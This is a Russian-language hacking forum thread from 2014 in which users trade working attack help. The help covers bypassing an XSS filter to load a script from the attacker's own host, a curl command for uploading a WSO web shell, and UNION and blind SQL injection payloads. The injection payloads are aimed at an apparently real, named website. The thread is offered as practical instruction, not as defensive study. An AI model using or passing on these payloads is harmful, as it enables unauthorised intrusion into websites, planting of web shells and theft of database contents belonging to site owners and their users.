ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.10.2014, 09:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 11466
Репутация:
3
|
|
Добрый день.
Имеется сайт с XSS: http://site.com/?name= XSS_TEXT
Html код этой страницы такой:
В свою очередь http://site.com/javascript-file.js?param= XSS_TEXT отдает вот что:
Код:
Code:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : "XSS_TEXT"
}
};
Проблема в том что режется ' , ( , ) , scripts .
Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что:
http://site.com/javascript-file.js?param= "}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":"
Код:
Code:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : ""}};
document.head.childNodes[1].src="http://mysite.com/global.js";
var b={"1":{"1":""
}
};
Fосле выполнения моего кода http://site.com/?name= "}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким:
src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js)
Спасибо
|
|
|
|

08.10.2014, 12:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
5
|
|
Сообщение от XAMEHA
XAMEHA said:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"file=@/home/user/shell/wso2.php"[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"Name=/var/www/wso2.php"[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/file.php
[/COLOR][/COLOR]
А можно еще детальнее?
Я ведь не введу в адресную строку браузера это?
|
|
|
|

08.10.2014, 12:55
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
TIGERSSS,
https://ru.wikipedia.org/wiki/CURL
|
|
|

08.10.2014, 15:26
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
TIGERSSS, Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера.
WendM, Строки можно представить в HEX-виде. Для выполнения можно использовать document.location и протокол javascript (не уверен, что схема заработает на всех современных браузерах).
|
|
|

08.10.2014, 16:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
5
|
|
Сообщение от XAMEHA
XAMEHA said:
TIGERSSS,
Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера.
Пример загрузки, или выполнения wso шелла с её помощью.
|
|
|
|

08.10.2014, 16:46
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Код:
Code:
curl -F "file=@/home/user/shell/wso2.php" -F "Name=/var/www/wso2.php" http://site.com/file.php
где "file=@/home/user/shell/wso2.php" путь до шелла на вашем пк. файл будет перемещен в папку "/var/www/" и доступен по адресу http://site.com/file.php, если /var/www/ путь до корневой папки сайта.
если передать в качестве Name="./", файл будет перемещен в ту же папку, где выполняется ваш скрипт. и доступен из под веба там же
|
|
|

13.10.2014, 20:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 50513
Репутация:
1
|
|
подскажите,пожалуйста.
при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+distinct+concat(0x27,unhex(Hex(cast(schema_nam e+as+char))),0x27)+from+`information_schema`.schem ata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+concat(0x27,count(table_name),0x27)+from+`info rmation_schema`.tables+where+table_schema=0x6A7573 74626974635F626974707463),0x31303235343830303536--
как можно вытащить таблицы из базы?
|
|
|
|

13.10.2014, 20:46
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от madam
madam said:
подскажите,пожалуйста.
при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+distinct+concat(0x27,unhex(Hex(cast(schema_nam e+as+char))),0x27)+from+`information_schema`.schem ata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+concat(0x27,count(table_name),0x27)+from+`info rmation_schema`.tables+where+table_schema=0x6A7573 74626974635F626974707463),0x31303235343830303536--
как можно вытащить таблицы из базы?
у вас функция count(table_name) — она выводит количество таблиц в вашей базе. чтобы вывести таблицы, запрос будет примерно таким:
Код:
Code:
?id=2+union+all+select+0x31303235343830303536,(select+concat(0x7e,0x27,table_name,0x27,0x7e)+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1),0x31303235343830303536--
и да, havij — грешно. нормальный запрос бы выглядел так:
Код:
Code:
+union+select+1,table_name,2+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1--+
далее перебирайте limit.
|
|
|

13.10.2014, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 50513
Репутация:
1
|
|
спасибо конечно,вот только без havij никак,редирект на главную стр.(
да и havij дальше имя базы не продвигается((
вот ссылка http://bitptc. com/recommends/?id=5 db justbitc_bitptc
|
|
|
|

13.10.2014, 22:10
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
тогда в вашем случае стоит раскручивать как blind sql.
Код:
Code:
http://bitptc.com/recommends/?id=5+and+1=1--+
- редирект (значит запрос корректен)
Код:
Code:
http://bitptc.com/recommends/?id=5+and+1=2--+
- нет редиректа
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|